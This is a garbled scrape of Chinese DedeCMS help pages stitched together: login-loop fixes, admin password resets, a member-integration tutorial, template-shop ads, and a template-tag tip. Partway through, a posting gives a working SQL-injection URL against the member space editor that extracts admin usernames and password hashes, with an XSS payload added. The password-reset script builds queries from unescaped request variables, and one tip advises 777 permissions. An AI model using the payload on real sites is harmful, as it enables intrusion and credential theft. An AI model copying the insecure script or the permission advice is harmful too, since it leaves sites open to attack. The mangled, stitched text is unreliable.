DEDE织梦后台登陆成功，然后跳转到登陆页面的解决方案/织梦网站后台访问总是自动跳转到着陆
session.name&=&PHPSESSID&改成这样就行了1..---首先，网站的data这个文件要有可写入的权限，我们要改这个文件夹的权限，打开IIS&站点&右键&权限&然后就会出现一下界面然后选择&来宾用户这个用户组管的是所有访问的权限&也有很多人的空间不是这个用户组，大部分是Users&这个开头的用户组注意不是那个Administrator的管理员用户组，是第三个&Users&这个用户组，点击它。点上那个&写入&的权限&然后&确定然后就是清理浏览器的缓存(不然还是登陆不上),或者直接换个浏览器，火狐或者遨游都可以，不要用360,360用的是IE内核。然后进后台，你就发现进入久别的后台了。但是织梦自身会显示网站的权限又安全问题，然后就是进后台修改&upload&data&和静态生成的HTML文件夹的可执行脚本&选择&无然后进后台，你就发现安全提示没有了，大功告成。如果还不行session.name&=&PHPSESSID&改成这样就行了2.--在/data/sessi*****上设置可写权限。&可解决!!3...---从上面问题可以大概看出和我dede5.7的那个网站问题应该差不多，虽然这个网站不是验证码错误也是有原因的，由于我以前比较懒，觉得每次登陆有台要输入验证码太麻烦了，就直接修改系统文件取消了验证码，每次直接登陆即可。使用dede5.7登陆后台验证码不正确的解决方法这篇文章所说道的方法更改dede根目录下/data/sessions/的sess_***文件修改权限为777，再次登陆问题依旧，难道是dede5.6不适用dede5.7的方法?重复更换登录器、清空网页缓存删除COOKIES，还是没能解决，搜遍了网络，谷歌百度都被我翻到了50页后都没找到这个问题的处理方法，唯一有点启示就是让备份数据库，重新安装dedecms，这方法也太那个麻烦了，如果下次还出现这样的问题不是还需要这么麻烦?我发现我这个网站/data/sessions/下的sess_开头文件比我dede5.7新站的文件多的多，都是按日期记录的，我想既然前面那个网站可以在这里解决问题，那么这个网站多半是这里了，反正搞不定的话要重新安装cms还不如死马当活马医，索性我删除/data/sessions/下所有文件。嘿，没想到这马还被我医活了，再次登陆网站后台还一次性进去了。总结今天这两个都是dedecms后台登陆的问题，发现都是同一vps下网站，前些天都没问题为什么今天一次性复发了呢?这可能就是问题的根源。&1、修改DATA和sessions的目录属性为可写，即(777)。2、清空sessions内除index.html以外的所有文件。3、清除IE缓存：更换浏览器，火狐，谷歌。4、在include/config.base.php里修改参数。&
请各位遵纪守法并注意语言文明6759人阅读
DeDeCMS（53）
在本地搬家到空间上时，我想修改dedeCMS后台管理员密码及用户名，可是不知从何下手，下面我们学习一个方法。
1、首先进入你的MYSQL后台，然后在你的名用中 找到dede_admin这项如图：
2、然后点他右边的 &浏览&按扭 “图右”
3、然后会看到下面的图：
4、然后我们看到了自己的用户名与MD5加密的密码，DEDE是多少位加密的我不知道，MD5我试了好多也解不了。现在只有改掉密码，先在前面的选项打钩 然后点下面的 “更改”按钮（就是那个笔）如图:
&注意：如果要修改登陆后台的用户名，那么要修改userid这一项。
5、把下面的MD5码替换以前的MD5码&
dedecms 5.3以上版本 版本 密码为admin
dedecms 5.1版本 密码为 123456
c3949ba59abbe56e057f&
其实最好的方法是你先本地安装下dedecms相对应的版本，然后再查看pwd字段的密码值，修改一下即可。
6、然后点“执行” 到后台你的密码就改成了admin
注：上面的操作虽然简单，但环境却不是那么容易的，需要你有phpmyadmin，如果你可能就自己安装一个phpmyadmin，如果没条件就只要问服务器管理人员要了。对于phpmyadmin的配置方法，我们会给你提供一个好点的，容易的。phpmyadmin不断升级，使用越来越不人性化。（当然我们也可以直接安装phpstudy）
下面是重要的补充：如果上面的方法不对可能是因为版本问题。针对的是dedecms v5.1
今日在帮一会员处理dede一些问题时发现忘记了管理员密码，囧。重新安装的话太费劲，便想进入mysql中修改密码，整个过程还是比较麻烦。本想从自己一个dedeV5.5的测试站点上复制密码来更新，但由于忘记密码的站点版本是V5.1的，覆盖密码后却怎么也登录不上。后来Google之，发现原来V5.1的加密算法跟V5.5的不同，生成的密码密文亦不同。几经周折，找到一加密后的密文是“c3949ba59abbe56e057f”，然后到sql中执行更新，具体脚本如下：&
---将管理员密码重置为123456&
Update `dede_admin` set pwd='c3949ba59abbe56e057f' where userid='admin'
由于要进入到数据库中去执行该语句，相对比较麻烦，于是写成个脚本，内容如下(注：此方法适用于dedecms v5.1):&
require_once(dirname(__FILE__).&/include/config_base.php&);
$dsql = new DedeSql(false);
$dsql-&ExecuteNoneQuery(&Update `mbtx_admin`
set pwd='e10adc3949ba59abbe56e057' where userid='admin'&);
$dsql-&Close();
echo '密码重置成功！新密码为123456。';
将上面内容复制进入文本编辑器后保存为mbtxpass.php，上传到站点根目录，运行该文件，成功执行后请立即删除该文件。&
注意：上面脚本是必须保证你的管理员用户名为“admin”的前提下方可执行，如果非admin，请将userid=’admin’中的admin改成你的用户名再执行即可。
适用于 DedeCms V5.3-5.6 版本
dedecms管理员帐号密码忘记了怎么办？忘记了也不用紧张，只要在网站根目录下上传个文件就可以重置了。&
可以使用官方团队提供的密码重设工具来重置网站密码。&
密码重设工具有UTF-8/GBK两个版本，适用于 DedeCms V5.3-5.6 版本。&
这样可以方便新手操作。也可以进数据库对加密后的密码进行破解，这样也能找回忘记了的密码。&
一、GBK版本的网站点下面的 show source? 复制这段代码。&
//error_reporting(E_ALL || ~E_NOTICE);
require_once(dirname(__FILE__).&/include/common.inc.php&);
if(empty($step))
$step = 1;
&!DOCTYPE html PUBLIC &-//W3C//DTD XHTML 1.0 Transitional//EN& &http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&&
&html xmlns=&http://www.w3.org/1999/xhtml&&
&meta http-equiv=&Content-Type& content=&text/ charset=gb2312& /&
&title&密码重设工具_GBK&/title&
&style type=&text/css&&
font-family: &MS Serif&, &New York&,
font-size: 12
color: #000;
border-top-width: 1
border-right-width: 1
border-left-width: 1
border-top-style:
border-right-style:
border-left-style:
border-top-color: #CCC;
border-right-color: #CCC;
border-left-color: #CCC;
border-bottom-width: 1
border-bottom-style:
border-bottom-color: #CCC;
if($step==1)
$dsql-&SetQuery(&Select * From `moban_admin` where usertype='10'&);
$dsql-&Execute(&ut&);
&table width=&98%& border=&0& align=&center& cellpadding=&3& cellspacing=&1&&
&td height=&19& bgcolor=&#E7E7E7&&&table width=&96%& border=&0& cellspacing=&1& cellpadding=&1&&
&td width=&24%&&&b&&strong&第一步：选择管理员账号&/strong&&/b&&/td&
&td width=&76%& align=&right&&&&/td&
&/table&&/td&
&td height=&215& align=&center& valign=&top& bgcolor=&#FFFFFF&&&form action=&radminpass.php& method=&post& name=&form1& id=&form1&&
&input type=&hidden& name=&step& value=&2& /&
&table width=&98%& border=&0& cellspacing=&1& cellpadding=&1&&
&td height=&60& colspan=&2& align=&left&&本工具是用于新人忘记管理员密码重设所制作，只需要将radminpass.php文件拷贝到根目录，运行“http://yousite/radminpass.php（yousite为网站域名）”，按照操作执行就可以。&font color=&#FF0000&&恢复完成后请及时删除文件!&/font&&/td&
&td width=&16%& height=&30& align=&left&&选择超级管理员ID：&/td&
&td width=&84%& align=&left&&
&select name='id' style='width:150px'&
while($myrow = $dsql-&GetObject(&ut&))
echo &&option value='&.$myrow-&id.&'&&.$myrow-&userid.&&/option&\r\n&;
&td height=&60& align=&left&&&&/td&
&td align=&left&&&input type=&submit& name=&Submit& value=&下一步&& class=&coolbg np& /&&/td&
&/form&&/td&
}elseif($step==2){
$row = $dsql-&GetOne(&Select * From `moban_admin` where id='$id'&);
&table width=&98%& border=&0& align=&center& cellpadding=&3& cellspacing=&1&&
&td height=&19& bgcolor=&#E7E7E7&&&table width=&96%& border=&0& cellspacing=&1& cellpadding=&1&&
&td width=&24%&&&b&&strong&第二步：修改管理员密码&/strong&&/b&&/td&
&td width=&76%& align=&right&&&&/td&
&/table&&/td&
&td height=&215& align=&center& valign=&top& bgcolor=&#FFFFFF&&&form action=&radminpass.php& method=&post& name=&form1& id=&form1&&
&input name=&step& type=&hidden& id=&step& value=&3& /&
&input type=&hidden& name=&id& value=&&?php echo $row['id']?&& /&
&table width=&98%& border=&0& cellspacing=&1& cellpadding=&1&&
&td width=&16%& height=&30& align=&left&&用户登录ID：&/td&
&td width=&84%& align=&left&&&?php echo $row['userid']?&&/td&
&td height=&30& align=&left&&用户笔名：&/td&
&td align=&left&&&input name=&uname& type=&text& id=&uname& size=&16& value=&&?php echo $row['uname']?&& style=&width:200px& /&
&（发布文章后显示责任编辑的名字） &/td&
&td height=&30& align=&left&&用户密码：&/td&
&td align=&left&&&input name=&pwd& type=&text& id=&pwd& size=&16& style=&width:200px& /&
&（留空则不修改，只能用'0-9a-zA-Z.@_-!'以内范围的字符） &/td&
&td height=&60& align=&left&&&&/td&
&td align=&left&&&input type=&submit& name=&Submit& value=&确定修改 & class=&coolbg np& /&&/td&
&/form&&/td&
}elseif($step==3){
$pwdm = '';
if($pwd!=''){
$pwdm = &,pwd='&.md5($pwd).&'&;
$pwd = &,pwd='&.substr(md5($pwd),5,20).&'&;
$query = &Update `moban_admin` set uname='$uname' $pwd where id='$id'&;
$dsql-&ExecuteNoneQuery($query);
$query = &Update `moban_member` set uname='$uname' $pwdm where mid='$id'&;
$dsql-&ExecuteNoneQuery($query);
ShowMsg(&成功更改帐户！&,&radminpass.php&);
以上HTML代码中：
1、在最开头就去读include/下的common.inc.php文件，如果为空，那么就是step=1;
//error_reporting(E_ALL || ~E_NOTICE);
require_once(dirname(__FILE__).&/include/common.inc.php&);
if(empty($step))
$step = 1;
2、在body体中做的第一件事就是查询moban_admin表中的所有字段
if($step==1)
$dsql-&SetQuery(&Select * From `moban_admin` where usertype='10'&);
$dsql-&Execute(&ut&);
3、在表格中一个格子里去加载radminpass.php
&td height=&215& align=&center& valign=&top& bgcolor=&#FFFFFF&&&form action=&radminpass.php& method=&post& name=&form1& id=&form1&&
4、在下拉框中把数据库中找到的id及userid显示出来
&select name='id' style='width:150px'&
while($myrow = $dsql-&GetObject(&ut&))
echo &&option value='&.$myrow-&id.&'&&.$myrow-&userid.&&/option&\r\n&;
5、更新数据库
}elseif($step==3){
$pwdm = '';
if($pwd!=''){
$pwdm = &,pwd='&.md5($pwd).&'&;
$pwd = &,pwd='&.substr(md5($pwd),5,20).&'&;
$query = &Update `moban_admin` set uname='$uname' $pwd where id='$id'&;
$dsql-&ExecuteNoneQuery($query);
$query = &Update `moban_member` set uname='$uname' $pwdm where mid='$id'&;
$dsql-&ExecuteNoneQuery($query);
ShowMsg(&成功更改帐户！&,&radminpass.php&);
三、保存为radminpass.php，上传到网站根目录运行“http://yousite/radminpass.php（yousite为网站域名）”，按照操作执行就可以。恢复完成后请及时删除这个文件!&
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：235515次
积分：3207
积分：3207
排名：第7260名
原创：78篇
转载：48篇
评论：13条
(13)(3)(50)(56)(4)建网站选织梦模板，首选跟版网(最大的织梦模板商城)，您可以把织梦模板网：
亲，跟版网是中国最具专业的DEDECMS模板资源提供商！您可以选择或者
织梦删掉会员空间，保留开放会员（禁止注册）的方法。
& &以下内容您可能感兴趣： &
一看标题就知道很拗口。但是今天BOSS特别需求这个功能。
首先BOSS的要求是，有UChome，会员全部都在里面，然后去掉织梦的会员。
但是在UCHOME登录后，返回织梦也能看到登录会员的信息。
首先UCHOME和织梦的整合前辈们已经说过了很多方法，这里不多说。
再看看BOSS的要求，是不是也很符合你。
1，去掉织梦会员空间（直白点就是不需要织梦会员系统）
2，保留织梦开放会员（后台有个保留会员开放功能）
3，织梦首页显示在UCHOME登录的会员名、退出登录等功能。
1， /member这个文件下保留config.php，ajax_loginsta_bak.php，index_do.php。其他毫不犹豫地删掉。
模板文件夹下的index.htm，
保留&script language=&javascript& type=&text/javascript& src=&{dede:global.cfg_cmsurl/}/include/dedeajax2.js&&&/script&&
function CheckLogin(){
&& var taget_obj = document.getElementById('_userlogin');
&& myajax = new DedeAjax(taget_obj,false,false,'','','');
&& myajax.SendGet2(&/member/ajax_loginsta.php&);
&& DedeXHTTP =
如果已经删掉的，需要重新添加（一开始我就直接全部删掉，再自己写html。。呆。。。），这里我们注意到(&/member/ajax_loginsta.php&);其实这就是路径了，可以改来改去，指对文件的位置就可以了，我们不管它。ajax_loginsta_bak.php，index_do.php这两个都有require_once(dirname(__FILE__).&/config.php&);是config.php的路径。
3，然后看看html的调用：
&&&&&&& &div id=&_userlogin& style=&float:&&
&&&&&&&&&& &div class=&userlogin&&
&&&&&&&&&&& &a href=&UCHOME的登录地址&&欢迎登陆&/a&
&&&&&&&&&& &&a href=&UChome的注册地址&&免费注册&/a&
&&&&&&&&& &/div&
&&&&&&& &/div&
&&&&&&& &script language=&javascript& type=&text/javascript&&CheckLogin();&/script& 这句是调用会员。。。。
注意保留div的id。登录后自动隐藏id=&_userlogin&。
4，没出什么意外的话，就完成了，但是我们想更完美点，不是么？
打开ajax_loginsta.php。把你想去掉的都去掉吧。
以下是本人保留的那部分：
require_once(dirname(__FILE__).&/config.php&);
AjaxHead();
if($myurl == '')
&exit('');
$uid& = $cfg_ml-&M_LoginID;
&div class=&userinfo& style=&float:&&
&&& &div class=&welcome&&
&&& &span style=&color:#F60;&&&?php echo $cfg_ml-&M_UserN ?&&/span& &a href=&/home& target=&_blank&&&返回家园&/a& | &a href=&/member/index_do.php?fmdo=login&dopost=exit&&退出登录&/a&
&&&& &/div&
&/div&&!-- /userinfo --&
5，最后别忘记了后台&开启会员功能&，&禁止会员注册&。生成首页。。。。其他页面方法类同。
跟版网-专业织梦模板下载平台，转载请注明出处：
& &精心为您推荐： &
& &邀您关注： &
扫描左侧二维码即可在手机端访问此页面
扫描左侧二维码即可关注跟版网官方微信公众号，获取金币模板，还可以免费仿站哦！
扫描左侧二维码即可加入跟版网官方群，免费获取金币资源并可以与其他织梦高手共同交流学习
跟版网率先实现织梦的三网合一网站，从即日起（）日，跟版网会陆续免费分享一批金币资源给需要的朋友，关注本站认证官方微信公众账号并回复相应的提取码，系统会自动将下载地址发送给您，同时这些金币资源也会分享在官方的QQ群中，欢迎各位朋友踊跃加入。另外本站后期会每周选择大家比较喜欢的网站仿制，并免费分享给大家，还有免费送金币活动哦！
评论列表（网友评论仅供网友表达个人看法，并不表明本站同意其观点或证实其描述）
- dede源码分享
售价:10金币
- dede源码分享
售价:16金币
- dede源码分享
售价:20金币
- dede模板分享
售价:0金币
- dede源码分享
售价:60金币
& & & 跟版网竭力打造中国最大的织梦源码和织梦模板商城，我们有一批经验丰富的设计师和程序员，发展五年，跟版网拥有丰富的织梦模板，欢迎您的咨询，我们将竭诚为您提供最优质的服务。
& & & 跟版网织梦源码商城坚持“创意+品质+服务”的高端理念，运用创意设计的理念为您塑造高品质的网络品牌形象。凭借五年的探索和实践，跟版网织梦源码商城拥有一支经验丰富、技术精湛、尽职尽责的网络服务团队。精品网站建设，从跟版网织梦源码商城建站开始。
& & & 跟版网织梦源码和模板可分为两种形式获得，一种是官方源码，另外一种是会员共享源码。两种源码都分为免费和收费两种形式。
& & & 跟版网官方收费源码可通过支付费用获得，具体操作流程可查看网址：。会员共享源码可通过共享模板获取金币下载。如觉得麻烦，可以联系客服QQ：进行金币充值，充值后可随意下载。DedeCMS会员中心空间管理SQL注射0day漏洞-源码库|专注为中国站长提供免费商业网站源码下载！
当前位置:---DedeCMS会员中心空间管理SQL注射0day漏洞
DedeCMS会员中心空间管理SQL注射0day漏洞
发布日期：
发布作者：c4rp3nt3r
漏洞类型：SQL注入
漏洞描述：DedeCMS会员中心空间管理SQL注射0day漏洞,成功利用该漏洞可获得管理员密码.
需要能使用引号.危害也不大,直接发漏洞利用代码:
漏洞参数 oldspacelogo SQL注射
/member/edit_space_info.php?dopost=save&pagesize=120&oldspacelogo=/de/uploads/userup/3/eee.jpg%27and%20@%60%27%60,spacelogo=%28select%20concat%28userid,0x3a,pwd,database()%29%20from%20%60%23@__admin%60%20limit%201%29,spacename='&script&alert(999)&/script&',sign=%27c4rp3nt3r
相关漏洞发布：
相关资源下载：
漏洞发布搜索
漏洞发布推荐
热门源码推荐
热门漏洞发布
©2012让DedeCms问答,留言本,会员空间导航支持标签_最火下载站
您的位置： >
> 让DedeCms问答,留言本,会员空间导航支持标签
让DedeCms问答,留言本,会员空间导航支持标签
一直以来，DedeCms 的问答、留言本、会员空间导航等不支持系统标签，现在我们就来解决一下。
第一步：打开&/include/common.func.php&，该文件5.6版本默认存在，5.5的不存在自己建一个。然后在该文件中加入一个函数，代码如下：function pasterTempletDiy($path){&&require_once(DEDEINC.&/arc.partview.class.php&);&&global $cfg_basedir,$cfg_templets_&&$tmpfile = $cfg_basedir.$cfg_templets_dir.&/&.$//模版文件的路径&&$dtp = new PartView();&&$dtp-&SetTemplet($tmpfile);&&$dtp-&Display();}&// liehuo,net 让可恶的采集死去吧!
第二步，打开留言本的模版文件，默认的是/templets/plus/guestbook.htm
用以下代码替换原因的调用头部代码 &?php pasterTempletDiy(&default/head.htm&); ?&
DedeCms的问答及会员空间导航，按上边的方法即可。
上一篇： 下一篇：